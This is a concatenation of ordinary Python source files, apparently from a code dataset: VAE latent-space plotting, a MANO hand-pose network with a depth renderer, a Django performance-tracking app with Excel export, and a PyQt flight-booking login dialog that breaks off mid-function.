canvas[i*h:(i+1)*h, j*w:(j+1)*w] = generated_img[i*n+j, :].numpy().reshape(h, w)
plt.figure(figsize=(8, 8))
plt.imshow(canvas, cmap='gray')
plt.savefig('output/latent_space.png')
plt.close()
def generate_varying_latent(model, vary , filename = None, filepath = None):
# assume top half of z is z_g and bottom is z_l
z_prior_mean, z_prior_sig = 0, 1
if isinstance(model,LGGMVae):
y = tf.one_hot(tf.random.uniform(shape = [1], minval = 0, maxval = model.y_size, dtype = tf.int32), depth = model.y_size, dtype=tf.float32)
z_prior_mean, z_prior_sig = model.encode_y(y)
#z2 is global
if vary=='lower':
z1 = tf.random.normal(shape = [100,model.local_latent_dims])
z2 = tf.random.normal(shape=[1, model.global_latent_dims],mean=z_prior_mean,stddev=z_prior_sig) #100 samples of z2s
z2 = tf.tile(z2, [100,1]) # repeat z1 100 times
x_generated, x_hat_generated = model.decode(z2,z1, True)
elif vary=='upper':
z1 = tf.random.normal(shape = [1,model.local_latent_dims])
z1 = tf.tile(z1, [100,1]) # repeat z1 100 times
z2 = tf.random.normal(shape=[100, model.global_latent_dims],mean=z_prior_mean,stddev=z_prior_sig) #100 samples of z2s
x_generated, x_hat_generated = model.decode(z2,z1, True)
else:
# z2 = tf.random.normal(shape = [100, model.latent_dims//2])
# z1 = tf.random.normal(shape = [1,model.latent_dims//2])
# z1 = tf.tile(z1, [100,1]) # .transpose(2,0,1).squeeze(1) # repeat z1 100 times
# z2 is global
if vary == 'lower':
# z = np.concatenate([z1,z2], axis=1)
z2 = tf.random.normal(shape = [1, model.global_latent_dims])
z1 = tf.random.normal(shape = [100,model.local_latent_dims])
z2 = tf.tile(z2, [100,1])
x_generated, x_hat_generated = model.decode(z2,z1, True)
elif vary == 'upper':
# z = np.concatenate([z2,z1], axis=1)
z2 = tf.random.normal(shape = [100, model.global_latent_dims])
z1 = tf.random.normal(shape = [1,model.local_latent_dims])
z1 = tf.tile(z1, [100,1])
x_generated,_ = model.decode(z2,z1, True)
h,w,channel = model.image_shape[1:4]
n = np.sqrt(100).astype(np.int32)
canvas_x = np.empty((h*n, w*n, 3))
for i in range(n):
for j in range(n):
canvas_x[i*h:(i+1)*h, j*w:(j+1)*w,:] = x_generated[i*n+j].numpy().reshape(h, w, 3)
plt.figure(figsize=(8, 8))
plt.imshow(canvas_x, cmap='gray')
if filename is None:
plt.savefig(filepath + 'generate_varying_latent_' + vary + '.png')
else:
plt.savefig(filepath + filename + '.png')
plt.close()
if vary == 'lower':
canvas_x_hat = np.empty((h*n, w*n, 3))
for i in range(n):
for j in range(n):
canvas_x_hat[i*h:(i+1)*h, j*w:(j+1)*w,:] = x_hat_generated[i*n+j].numpy().reshape(h, w, 3)
plt.figure(figsize=(8, 8))
plt.imshow(canvas_x_hat, cmap='gray')
if filename is None:
plt.savefig(filepath + 'generate_x_hat_' + vary + '.png')
else:
plt.savefig(filepath + 'x_hat_' + filename + '.png')
plt.close()
return canvas_x, canvas_x_hat
return canvas_x
def generate_cluster(model, vary, filename = None, filepath = None):
# For LGGMVAE
# Default to only vary zg
y = tf.one_hot(tf.random.uniform(shape = [1], minval = 0, maxval = model.y_size, dtype = tf.int32), depth = model.y_size, dtype=tf.float32)
z_prior_mean, z_prior_sig = model.encode_y(y)
if vary=='zg_zl':
z_g = tf.random.normal(shape = [10, model.global_latent_dims],mean=z_prior_mean, stddev=z_prior_sig)
z_g = tf.reshape(tf.tile(z_g,tf.convert_to_tensor([1,10])),[10*z_g.shape[0],z_g.shape[1]]) #repeat each elem 10 times
z_l = tf.random.normal(shape = [10, model.local_latent_dims])
z_l = tf.tile(z_l,tf.convert_to_tensor([10,1])) # repeat z_l 10 times
elif vary=='zg':
z_g = tf.random.normal(shape = [100, model.global_latent_dims],mean=z_prior_mean, stddev=z_prior_sig)
z_l = tf.random.normal(shape = [1,model.local_latent_dims])
        z_l = tf.tile(z_l, [100, 1])  # repeat the single z_l 100 times
elif vary=='y_zg':
y = tf.one_hot(tf.random.shuffle(tf.range(0,model.y_size))[:10], depth=model.y_size, dtype=tf.float32)
z_prior_mean, z_prior_sig = model.encode_y(y)
z_g = []
for mean, sig in zip(z_prior_mean, z_prior_sig):
z_g.append(tf.random.normal(shape = [10, model.global_latent_dims],mean=mean, stddev=sig))
z_g = tf.reshape(tf.stack(z_g),[100,model.global_latent_dims])
z_l = tf.random.normal(shape = [1,model.local_latent_dims])
z_l = tf.tile(z_l, [100,1])
x_generated,_ = model.decode(z_g,z_l)
h,w,channel = model.image_shape[1:4]
n = np.sqrt(100).astype(np.int32)
canvas = np.empty((h*n, w*n, 3))
for i in range(n):
for j in range(n):
canvas[i*h:(i+1)*h, j*w:(j+1)*w,:] = x_generated[i*n+j].numpy().reshape(h, w, 3)
plt.figure(figsize=(8, 8))
plt.imshow(canvas, cmap='gray')
if filename is None:
plt.savefig(filepath + 'generate_cluster_' + vary + '.png')
else:
plt.savefig(filepath + filename + '.png')
plt.close()
return canvas
def unseen_cluster_lg(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
cluster_dict = defaultdict(list)
for i,test_data in enumerate(test_dataset):
if label:
images = test_data[0]
else:
images = test_data
x_test = images
_, y_logits = model.get_y(x_test)
y = tf.nn.softmax(y_logits, axis=1)
cluster = tf.argmax(y,axis=1)
for c in range(model.y_size):
cluster_samples = tf.unstack(x_test[cluster==c][:,:,:,:3])
score = tf.unstack(y[cluster==c][:,c])
if len(score)>0:
cluster_dict[c] += zip(score,cluster_samples)
global h, w, channel
h,w = x_test.shape[1:3]
channel = 3
    canvas = None  # stays None if every cluster turned out empty
    for c in range(model.y_size):
if len(cluster_dict[c])>0:
# print(cluster_dict[c])
cluster_dict[c].sort(key=lambda x: x[0], reverse=True)
cluster_samples = tf.stack([p[1] for p in cluster_dict[c][:7]])
num_samples = cluster_samples.shape[0]
# print(f'Cluster: {c}, samples: {num_samples}')
# if num_samples!=0: #draw only existing cluster
canvas = np.empty((h, w*num_samples, channel))
for j in range(num_samples):
canvas[0:h, j*w:(j+1)*w, :] = (cluster_samples[j]+1)*0.5
plt.figure()
plt.imshow(canvas)
plt.savefig(filepath + 'unseen_cluster_' + filename + '_' + str(c) + '.png')
plt.close()
# discrete_y = tf.one_hot(tf.argmax(y_logits,axis=1),model.y_size)
# z_prior_mean, z_prior_sig = model.encode_y(discrete_y)
# _, z_x_hat = model.encode(x_test)
# z_x = []
# for mean, sig in zip(z_prior_mean, z_prior_sig):
# z_x.append(tf.random.normal(shape = [10, model.global_latent_dims],mean=mean, stddev=sig))
# z_x = tf.reshape(tf.stack(z_x,axis=0),(10*n,model.global_latent_dims))
# z_x_hat = tf.reshape(tf.tile(z_x_hat,[1,10]),[10*z_x_hat.shape[0],z_x_hat.shape[1]]) # repeat 10 times
# x_recon, x_hat_recon = model.decode(z_x, z_x_hat, True)
# canvas_1 = np.empty((h*n+h, w*n, channel))
# for i in range(n):
# canvas_1[0:h, i*w:(i+1)*w, :] = (x_test[i,:,:,:3]+1)*0.5
# canvas_1[h:h*n+h,i*w:(i+1)*w, :] = x_recon[i*n:(i+1)*n].numpy().reshape((h*n,w,channel))
# plt.figure(figsize=(2*n,2))
# plt.imshow(canvas_1)
# if filename is None:
# plt.savefig(filepath + 'unseen_cluster.png')
# else:
# plt.savefig(filepath + 'unseen_cluster' + filename + '.png')
# plt.close()
return canvas
def unseen_cluster_lg_svhn(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
idx = tf.constant([26,101,3025,3129,3182,3233,3547,3695,10462,10471,10601,10608,16171,16289,
16593,16801,101,326,333,798,841,1189,6186,2651,1437,1826,5536,0,3040,3065,3106,3292,3762,
10427,10814,16338,16505,16606,16655,16875,16880],dtype=tf.int32)
test_data = loadmat('data/SVHN/test_32x32.mat')['X'].transpose((3,0,1,2)).astype(np.float32)/255.*2 - 1
# rand_x_idx = tf.random.shuffle(idx)[:n]
# x_test = test_data[rand_x_idx.numpy()]
x_test = test_data[idx]
h,w, channel = x_test.shape[1:4]
x_test = tf.tile(x_test,[1,1,1,2])
y, y_logits = model.get_y(x_test)
cluster = tf.argmax(y_logits,axis=1)
    canvas = None  # stays None if no test image lands in any cluster
    for i in range(model.y_size):
cluster_samples = x_test[cluster==i]
num_samples = cluster_samples.shape[0]
if num_samples!=0: #draw only existing cluster
canvas = np.empty((h, w*num_samples, channel))
for j in range(num_samples):
canvas[0:h, j*w:(j+1)*w, :] = (cluster_samples[j,:,:,:3]+1)*0.5
plt.figure()
plt.imshow(canvas)
plt.savefig(filepath + 'unseen_cluster_' + filename + '_' + str(i) + '.png')
plt.close()
# y, y_logits = model.get_y(x_test)
# discrete_y = tf.one_hot(tf.argmax(y_logits,axis=1),model.y_size)
# z_prior_mean, z_prior_sig = model.encode_y(discrete_y)
# _, z_x_hat = model.encode(x_test)
# z_x = []
# for mean, sig in zip(z_prior_mean, z_prior_sig):
# z_x.append(tf.random.normal(shape = [10, model.global_latent_dims],mean=mean, stddev=sig))
# z_x = tf.reshape(tf.stack(z_x,axis=0),(10*n,model.global_latent_dims))
# z_x_hat = tf.reshape(tf.tile(z_x_hat,[1,10]),[10*z_x_hat.shape[0],z_x_hat.shape[1]]) # repeat 10 times
# x_recon, x_hat_recon = model.decode(z_x, z_x_hat, True)
# canvas_1 = np.empty((h*n+h, w*n, channel))
# for i in range(n):
# canvas_1[0:h, i*w:(i+1)*w, :] = (x_test[i,:,:,:3]+1)*0.5
# canvas_1[h:h*n+h,i*w:(i+1)*w, :] = x_recon[i*n:(i+1)*n].numpy().reshape((h*n,w,channel))
# # plt.figure(figsize=(2*n,2))
# plt.imshow(canvas_1)
# if filename is None:
# plt.savefig(filepath + 'unseen_cluster.png')
# else:
# plt.savefig(filepath + 'unseen_cluster' + filename + '.png')
# plt.close()
return canvas
def unseen_cluster(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
for test_data in test_dataset:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
global h, w, channel
h,w = x_test.shape[1:3]
channel = 3
y, y_logits = model.get_y(x_test)
discrete_y = tf.one_hot(tf.argmax(y_logits,axis=1),model.y_size)
z_prior_mean, z_prior_sig = model.encode_y(discrete_y)
z_x = []
for mean, sig in zip(z_prior_mean, z_prior_sig):
z_x.append(tf.random.normal(shape = [10, model.global_latent_dims],mean=mean, stddev=sig))
z_x = tf.reshape(z_x,(10*n,model.global_latent_dims))
x_recon = model.decode(z_x, True)
canvas_1 = np.empty((h*n+h, w*n, channel))
for i in range(n):
canvas_1[0:h, i*w:(i+1)*w, :] = (x_test[i,:,:,:3]+1)*0.5
canvas_1[h:h*n+h,i*w:(i+1)*w, :] = x_recon[i*n:(i+1)*n].numpy().reshape((h*n,w,channel))
# plt.figure(figsize=(2*n,2))
plt.imshow(canvas_1)
if filename is None:
plt.savefig(filepath + 'unseen_cluster.png')
else:
plt.savefig(filepath + 'unseen_cluster' + filename + '.png')
plt.close()
return canvas_1
def unseen_cluster_svhn(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
idx = tf.constant([26,101,3025,3129,3182,3233,3547,3695,10462,10471,10601,10608,16171,16289,
16593,16801,101,326,333,798,841,1189,6186,2651,1437,1826,5536,0,3040,3065,3106,3292,3762,
10427,10814,16338,16505,16606,16655,16875,16880],dtype=tf.int32)
test_data = loadmat('data/SVHN/test_32x32.mat')['X'].transpose((3,0,1,2)).astype(np.float32)/255.*2 - 1
rand_x_idx = tf.random.shuffle(idx)[:n]
x_test = test_data[rand_x_idx.numpy()]
h,w, channel = x_test.shape[1:4]
y, y_logits = model.get_y(x_test)
discrete_y = tf.one_hot(tf.argmax(y_logits,axis=1),model.y_size)
z_prior_mean, z_prior_sig = model.encode_y(discrete_y)
z_x = []
for mean, sig in zip(z_prior_mean, z_prior_sig):
z_x.append(tf.random.normal(shape = [10, model.global_latent_dims],mean=mean, stddev=sig))
z_x = tf.reshape(z_x,(10*n,model.global_latent_dims))
x_recon = model.decode(z_x, True)
canvas_1 = np.empty((h*n+h, w*n, channel))
for i in range(n):
canvas_1[0:h, i*w:(i+1)*w, :] = (x_test[i,:,:,:3]+1)*0.5
canvas_1[h:h*n+h,i*w:(i+1)*w, :] = x_recon[i*n:(i+1)*n].numpy().reshape((h*n,w,channel))
# plt.figure(figsize=(2*n,2))
plt.imshow(canvas_1)
if filename is None:
plt.savefig(filepath + 'unseen_cluster.png')
else:
plt.savefig(filepath + 'unseen_cluster' + filename + '.png')
plt.close()
return canvas_1
``` |
{
"source": "517030910405/mano_test",
"score": 2
} |
#### File: mano_test/mano/net_mano.py
```python
import os
import numpy as np
import torch
import torch.nn as nn
from torch.nn import Module
import neural_renderer as nr
from pose.manopth.manopth.manolayer import ManoLayer
from .theta_regressor import ThetaRegressor
class EncEncoder(nn.Module):
def __init__(self, inp_ch, out_ch, name='enc'):
super(EncEncoder, self).__init__()
self.name=name
self.inp_ch = inp_ch
self.out_ch = out_ch
self.encenc = nn.Sequential()
# (64x64 -> 1x1)
ds_reslu = [
32,
16,
8,
4,
2,
1,
]
for reslu in ds_reslu:
if reslu == 4 or reslu == 2:
mid_ch = inp_ch * 2
elif reslu == 1:
mid_ch = self.out_ch
else:
mid_ch = inp_ch
kernel_size = 3
self.encenc.add_module(
name = self.name + '_conv_{}'.format(reslu),
module = nn.Conv2d(
inp_ch,
mid_ch,
kernel_size=kernel_size,
stride=2,
padding=(kernel_size-1)//2,
bias=True
)
)
if reslu != 1:
self.encenc.add_module(
name = self.name + '_bn_{}'.format(reslu),
module = nn.BatchNorm2d(mid_ch)
)
self.encenc.add_module(
name = self.name + '_relu_{}'.format(reslu),
module = nn.LeakyReLU(inplace=True)
)
inp_ch = mid_ch
def forward(self, x):
batch_size = x.shape[0]
return self.encenc(x).reshape(batch_size, -1) #(B, 2048)
class ManoRender(nn.Module):
def __init__(
self,
fill_back=True,
):
super(ManoRender, self).__init__()
self.fill_back=fill_back
''' Render Depth '''
def forward(
self,
vertices,
faces,
Ks=None,
Rs=None,
ts=None,
dist_coeffs=None,
bbxs=None,
image_size=64,
orig_size=64,
anti_aliasing=False,
far = 100.0,
):
# batch_size = vertices.shape(0)
if self.fill_back:
faces = torch.cat(
(
faces,
faces[:, :, list(reversed(range(faces.shape[-1])))]
),
dim=1,
).to(vertices.device).detach()
        if Ks is None:
            raise ValueError("Ks must not be None when rendering a depth map")
if Rs is None:
Rs = torch.Tensor(
[
[1,0,0],
[0,1,0],
[0,0,1],
]
).view((1,3,3)).to(vertices.device)
if ts is None:
ts = torch.Tensor([0,0,0]).view((1,3)).to(vertices.device)
if dist_coeffs is None:
dist_coeffs = torch.Tensor([[0., 0., 0., 0., 0.]]).to(vertices.device)
''' xyz -> uvd '''
vertices = self.projection(
vertices, Ks, Rs, ts, dist_coeffs, orig_size, bbxs=bbxs
)
faces = nr.vertices_to_faces(vertices, faces)
# rasteriation
rast = nr.rasterize_depth(faces, image_size, anti_aliasing, far=far)
# normalize to 0~1
rend = self.normalize_depth(rast, far=far)
return rend
    def normalize_depth(self, img, far):
        img_inf = torch.eq(img, far * torch.ones_like(img)).type(torch.float32)  # 1.0 where depth == far (background)
        img_ok = 1 - img_inf  # 1.0 on foreground pixels
        img_no_back = img_ok * img  # depth map with the background zeroed out
        img_max = img_no_back.max(dim=1, keepdim=True)[0]  # per-image max over the foreground
        img_max = img_max.max(dim=2, keepdim=True)[0]
        img_min = img.min(dim=1, keepdim=True)[0]  # per-image min depth
        img_min = img_min.min(dim=2, keepdim=True)[0]
        new_depth = (img_max - img) / (img_max - img_min)
        new_depth = torch.max(new_depth, torch.zeros_like(new_depth))  # clamp to [0, 1]; background maps to 0
        new_depth = torch.min(new_depth, torch.ones_like(new_depth))
        return new_depth
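    # Worked example (an illustration, not from the original file): with far=100 and a
    # single row img = [[100, 4, 2]], the far pixel is masked out, so img_max = 4 and
    # img_min = 2; (img_max - img) / (img_max - img_min) = [-48, 0, 1], which is then
    # clamped to [0, 0, 1] -- the background maps to 0 and the nearest point to 1.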
def projection(
self,
vertices,
Ks,
Rs,
ts,
dist_coeffs,
orig_size,
bbxs=None,
eps=1e-9,
):
        '''
        Calculate the projective transformation of vertices given a projection matrix.
        Input parameters:
        Ks: batch_size * 3 * 3 intrinsic camera matrices
        Rs, ts: batch_size * 3 * 3, batch_size * 1 * 3 extrinsic calibration parameters
        dist_coeffs: vector of distortion coefficients
        orig_size: original size of the image captured by the camera
        bbxs: batch_size * 4 crop boxes (x, y, w, h) in pixels; u and v are remapped into the crop
        Returns: for each point [X, Y, Z] in world coordinates, [u, v, z] where
        u, v are the coordinates of the projection in pixels and z is the depth
        Modified by <NAME>: add bbx
        '''
# instead of P*x we compute x'*P'
vertices = torch.matmul(vertices, Rs.transpose(2,1)) + ts
x, y, z = vertices[:, :, 0], vertices[:, :, 1], vertices[:, :, 2]
x_ = x / (z + eps)
y_ = y / (z + eps)
# Get distortion coefficients from vector
k1 = dist_coeffs[:, None, 0]
k2 = dist_coeffs[:, None, 1]
p1 = dist_coeffs[:, None, 2]
p2 = dist_coeffs[:, None, 3]
k3 = dist_coeffs[:, None, 4]
# we use x_ for x' and x__ for x'' etc.
r = torch.sqrt(x_ ** 2 + y_ ** 2)
x__ = x_*(1 + k1*(r**2) + k2*(r**4) + k3*(r**6)) + 2*p1*x_*y_ + p2*(r**2 + 2*x_**2)
y__ = y_*(1 + k1*(r**2) + k2*(r**4) + k3 *(r**6)) + p1*(r**2 + 2*y_**2) + 2*p2*x_*y_
vertices = torch.stack([x__, y__, torch.ones_like(z)], dim=-1)
vertices = torch.matmul(vertices, Ks.transpose(1,2))
u, v = vertices[:, :, 0], vertices[:, :, 1]
if bbxs is not None:
u = (u - bbxs[:,0:1])/bbxs[:,2:3] * orig_size
v = (v - bbxs[:,1:2])/bbxs[:,3:4] * orig_size
# map u,v from [0, img_size] to [-1, 1] to use by the renderer
v = orig_size - v
u = 2 * (u - orig_size / 2.) / orig_size
v = 2 * (v - orig_size / 2.) / orig_size
vertices = torch.stack([u, v, z], dim=-1)
return vertices
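# Minimal usage sketch for ManoRender (shapes and values below are assumptions for
# illustration, not part of the original file):
#     render = ManoRender()
#     verts = torch.rand(2, 778, 3)                    # MANO meshes have 778 vertices
#     faces = torch.randint(0, 778, (2, 1538, 3))      # placeholder triangle indices
#     Ks = torch.eye(3).unsqueeze(0).expand(2, 3, 3)
#     bbxs = torch.tensor([[0., 0., 64., 64.]]).expand(2, 4)
#     depth = render(verts, faces, Ks=Ks, bbxs=bbxs)   # (2, 64, 64) depth maps in [0, 1]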
class NetMano(nn.Module):
def __init__(
self,
mano_ncomps=6,
mano_root_idx=0,
mano_flat_hand_mean=True,
mano_hand_side='right',
mano_template_root='mano/models',
mano_scale_milimeter=False,
reg_inp_encs=['hm','dep'],
reg_inp_enc_res=64,
reg_niter=10,
reg_nfeats=2048,
njoints=21,
):
super(NetMano, self).__init__()
self.reg_inp_encs = reg_inp_encs
self.ncomps = mano_ncomps
self.render_res = reg_inp_enc_res
        self.reg_ntheta = 3 + mano_ncomps + 10  # 3 root rots + mano_ncomps pose PCA coeffs + 10 betas (19 with the default ncomps=6)
enc_ch = len(reg_inp_encs) * 256
self.enc_conv = nn.Conv2d(enc_ch, 256, kernel_size=1, stride=1, bias=True)
self.enc_encoder = EncEncoder(inp_ch=256, out_ch=reg_nfeats, name='encenc')
self.pred_ch = njoints + 1 # njoints heatmap + 1 depth
self.pred_conv = nn.Conv2d(self.pred_ch, 256, kernel_size=1, stride=1, bias=True)
self.pred_encoder = EncEncoder(inp_ch=256, out_ch=reg_nfeats, name='predenc')
self.leaky_relu = nn.LeakyReLU(inplace=True)
self.bn = nn.BatchNorm2d(256)
fc_layers = [
reg_nfeats + self.reg_ntheta, # 2048 + 19
1024,
1024,
self.reg_ntheta # 19
]
use_dropout = [True, True, False]
drop_prob = [0.3, 0.3, 0.3]
self.regressor = ThetaRegressor(
fc_layers=fc_layers,
use_dropout=use_dropout,
drop_prob=drop_prob,
ncomps=mano_ncomps,
iterations=reg_niter,
)
self.manolayer = ManoLayer(
root_idx=mano_root_idx,
flat_hand_mean=mano_flat_hand_mean,
ncomps=mano_ncomps,
hand_side=mano_hand_side,
template_root=mano_template_root,
scale_milimeter=mano_scale_milimeter,
)
template_pth = os.path.join(mano_template_root, 'HAND_TEMPLATE_RIGHT.obj')
self.template = nr.Mesh.fromobj(template_pth)
self.manorender = ManoRender()
def forward(self, encodings, hms, deps, poses_root, Ks, bbxs):
### prepare encodings
batch_size = hms.shape[0]
enc_list = []
for key in self.reg_inp_encs:
enc_list.append(encodings[key])
enc = torch.cat(enc_list, dim=1) #(B, 256x2, 64, 64)
enc = self.enc_conv(enc) #(B, 256, 64, 64)
enc = self.bn(enc)
enc = self.leaky_relu(enc)
enc = self.enc_encoder(enc) #(B, 2048)
x = torch.cat((hms, deps), dim=1) #(B, 22, 64, 64)
x = self.pred_conv(x) #(B, 256, 64, 64)
x = self.bn(x)
x = self.leaky_relu(x)
x = self.pred_encoder(x) #(B, 2048)
x = x + enc
thetas = self.regressor(x)
theta = thetas[-1]
th_pose_coeffs = theta[:, :(3+self.ncomps)] #(B, 0:9)
th_betas = theta[:, (3+self.ncomps):] #(B, 9:19)
verts, joints = self.manolayer(th_pose_coeffs, th_betas, poses_root)
faces = self.template.faces.unsqueeze(0).repeat((batch_size, 1, 1))
rendered = self.manorender(
vertices=verts,
faces=faces,
Ks=Ks,
bbxs=bbxs,
far=100.0,
image_size=self.render_res,
orig_size=self.render_res,
)
return verts, joints, rendered
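        # Shape walkthrough under the default constructor arguments (B = batch size):
        #   encodings[key] : (B, 256, 64, 64)  ->  enc : (B, 2048)
        #   hms (B, 21, 64, 64) + deps (B, 1, 64, 64)  ->  x : (B, 2048)
        #   theta : (B, 19) = 3 root rotations + 6 pose PCA coefficients + 10 betas
        #   rendered : (B, 64, 64) normalized depth maps produced by ManoRender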
``` |
{
"source": "519389812/management",
"score": 2
} |
#### File: management/perf/models.py
```python
from __future__ import unicode_literals
from django.db import models
#from django import forms
#from django.forms import ModelForm
import django.utils.timezone as timezone
# Create your models here.
perf_choices = (
(15.0,'加柜台/小时'),
(5.0,'挑行李/件'),
(20.0,'协助481/小时'),
(10.0,'结关/班'),
)
team_choices = (
('一室','一室'),
('二室','二室'),
('三室','三室'),
('团队','团队'),
)
verify_choices = (
('等待审核','等待审核'),
('未通过审核','未通过审核'),
('已审核','已审核'),
)
class Add(models.Model):
perf_id = models.AutoField(primary_key=True,verbose_name='序号')
name = models.CharField(max_length=8,verbose_name='姓名')
team = models.CharField(max_length=4,choices=team_choices,verbose_name='室别')
performance = models.FloatField(max_length=4,choices=perf_choices,verbose_name='加分项')
values = models.FloatField(max_length=4,verbose_name='数值')
workload = models.FloatField(max_length=4,default=0.0,verbose_name='绩效人数')
point = models.FloatField(max_length=4,default=0.0,verbose_name='绩效加分')
date = models.DateField(default=timezone.now,verbose_name='日期')
verify = models.CharField(max_length=8,default='等待审核',choices=verify_choices,verbose_name='审核状态')
def __unicode__(self):
return u'%s>>>>%s>>>>%s>>>>%s>>>>%s>>>>%s'%(self.name,self.team,self.workload,self.point,self.date,self.verify)
class Meta:
verbose_name='摘要'
verbose_name_plural='绩效登记'
year_choices = (
(2016,'2016'),
#(2017,'2017'),
)
month_choices = (
(1,'01'),
(2,'02'),
(3,'03'),
(4,'04'),
(5,'05'),
(6,'06'),
(7,'07'),
(8,'08'),
(9,'09'),
(10,'10'),
(11,'11'),
(12,'12'),
)
class Count(models.Model):
name = models.CharField(max_length=8,verbose_name='姓名')
team = models.CharField(max_length=4,choices=team_choices,verbose_name='室别')
year = models.IntegerField(verbose_name='年份',choices=year_choices)
month = models.IntegerField(verbose_name='月份',choices=month_choices)
workload = models.FloatField(max_length=4,default=0.0,verbose_name='绩效人数')
point = models.FloatField(max_length=4,default=0.0,verbose_name='绩效加分')
def __unicode__(self):
        return u'%s>>>>%s>>>>%s>>>>%s>>>>%s-%s' % (self.name, self.team, self.workload, self.point, self.year, self.month)
class Meta:
verbose_name='摘要'
verbose_name_plural='绩效统计'
```
#### File: management/perf/views.py
```python
from django.shortcuts import render,render_to_response
from django.http import HttpResponse,HttpResponseRedirect
from perf.models import Add,Count
from perf.forms import AddForm,CountForm,VerifyForm
from django.http import JsonResponse
import xlwt
from cStringIO import StringIO  # Python 2; on Python 3 io.BytesIO would be needed instead
# Create your views here.
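# perf/forms.py is not part of this snapshot; a minimal sketch of the forms imported
# above, assuming they are plain Django (Model)Forms over the models in perf/models.py:
#
#     from django import forms
#     from perf.models import Add, year_choices, month_choices
#
#     class AddForm(forms.ModelForm):
#         class Meta:
#             model = Add
#             fields = ['name', 'team', 'performance', 'values', 'date']
#
#     class CountForm(forms.Form):
#         year = forms.ChoiceField(choices=year_choices)
#         month = forms.ChoiceField(choices=month_choices)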
def add(req):
if req.method == 'POST':
form = AddForm(req.POST)
if form.is_valid():
perf_num=form.cleaned_data['performance']
values_num=form.cleaned_data['values']
new_perf=form.save(commit=False)
            if perf_num in (5.0, 10.0):  # luggage (per item) and clearance (per shift) count toward workload
                new_perf.workload = perf_num * values_num
            else:  # counter and assist hours (15.0 / 20.0) count toward bonus points
                new_perf.point = perf_num * values_num
new_perf.save()
form.save_m2m()
return HttpResponse('提交成功!')
else:
form = AddForm()
return render_to_response('add.html',{'form':form})
def excel_output(req):
wb = xlwt.Workbook(encoding = 'utf-8')
sheet = wb.add_sheet(u'统计')
response = HttpResponse(content_type='application/vnd.ms-excel')
response['Content-Disposition'] = 'attachment;filename=export_performance.xls'
sheet.write(0,0, '姓名')
sheet.write(0,1, '室别')
sheet.write(0,2, '年份')
sheet.write(0,3, '月份')
sheet.write(0,4, '工作量')
sheet.write(0,5, '绩效加分')
row = 1
for count in Count.objects.all():
sheet.write(row,0, count.name)
sheet.write(row,1, count.team)
sheet.write(row,2, count.year)
sheet.write(row,3, count.month)
sheet.write(row,4, count.workload)
sheet.write(row,5, count.point)
row = row + 1
output = StringIO()
wb.save(output)
output.seek(0)
response.write(output.getvalue())
return response
def count(req):
    if req.method == 'POST':
        form = CountForm(req.POST)
        if form.is_valid():
            Count.objects.all().delete()  # rebuild the monthly summary from scratch
            date_year = form.cleaned_data['year']
            date_month = form.cleaned_data['month']
            records = Add.objects.filter(date__year=date_year, date__month=date_month, verify='等待审核')
            for record in records:  # accumulate per-person totals
                if Count.objects.filter(name=record.name).exists():
                    row = Count.objects.get(name=record.name)
                    row.workload = row.workload + record.workload
                    row.point = row.point + record.point
                    row.save()
                else:
                    row = Count(name=record.name, team=record.team, workload=record.workload,
                                point=record.point, year=date_year, month=date_month)
                    row.save()
            return HttpResponseRedirect('/excel_download/')
    else:
        form = CountForm()
    return render_to_response('count.html', {'form': form})
def verify(req):
details = Add.objects.filter(verify='等待审核')
list_detail = list()
for detail in details:
list_detail.append(str(detail.name))
#dict_detail = {'姓名':detail.name,'室别':detail.team,'绩效类型':detail.performance,'绩效量':detail.values,'日期':str(detail.date)}
return JsonResponse(list_detail,safe=False)
``` |
{
"source": "519401113/course-design",
"score": 2
} |
#### File: 519401113/course-design/login.py
```python
from PyQt5.QtWidgets import *
from PyQt5.QtSql import *
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
    power = 0      # permission level: 0 = not logged in, 1 = user, 2 = admin
    username = ''  # logged-in user name
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(410, 398)
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(Dialog)
font = QtGui.QFont()
font.setFamily("Adobe Devanagari")
font.setPointSize(16)
self.label.setFont(font)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.label_2)
self.user_name = QtWidgets.QLineEdit(Dialog)
self.user_name.setObjectName("user_name")
self.verticalLayout.addWidget(self.user_name)
self.label_3 = QtWidgets.QLabel(Dialog)
self.label_3.setObjectName("label_3")
self.verticalLayout.addWidget(self.label_3)
self.password = QtWidgets.QLineEdit(Dialog)
self.password.setEchoMode(QtWidgets.QLineEdit.Password)
self.password.setObjectName("password")
self.verticalLayout.addWidget(self.password)
self.cancel = QtWidgets.QPushButton(Dialog)
self.cancel.setObjectName("cancel")
self.verticalLayout.addWidget(self.cancel)
self.login = QtWidgets.QPushButton(Dialog)
self.login.setObjectName("login")
self.verticalLayout.addWidget(self.login)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
self.login.clicked.connect(self.login_check)
self.cancel.clicked.connect(self.window_close)
self.user_name.returnPressed.connect(self.login_check)
self.password.returnPressed.connect(self.login_check)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.label.setText(_translate("Dialog", "机票订购系统登录"))
self.label_2.setText(_translate("Dialog", "用户名"))
self.user_name.setPlaceholderText(_translate("Dialog", "请输入用户名"))
self.label_3.setText(_translate("Dialog", "密码"))
self.password.setPlaceholderText(_translate("Dialog", "请输入密码"))
self.cancel.setText(_translate("Dialog", "取消"))
self.login.setText(_translate("Dialog", "登录"))
def login_check(self):
user_name = self.user_name.text()
password = self.password.text()
if (user_name == "" or password == ""):
print(QMessageBox.warning(self, "警告", "用户名和密码不可为空!", QMessageBox.Yes))
return
        # look the user up in the database
        query = QSqlQuery()  # create the query object
        query.prepare('SELECT * FROM 用户表 '
                      'WHERE 用户名 = :user_name')  # prepare the SQL statement
        query.bindValue(":user_name", user_name)  # bind the named placeholder
query.exec_()
if (not query.next()):
